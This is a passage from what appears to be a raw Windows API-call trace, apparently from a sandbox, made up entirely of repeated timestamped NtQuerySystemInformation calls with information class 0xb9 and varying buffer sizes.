(SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, 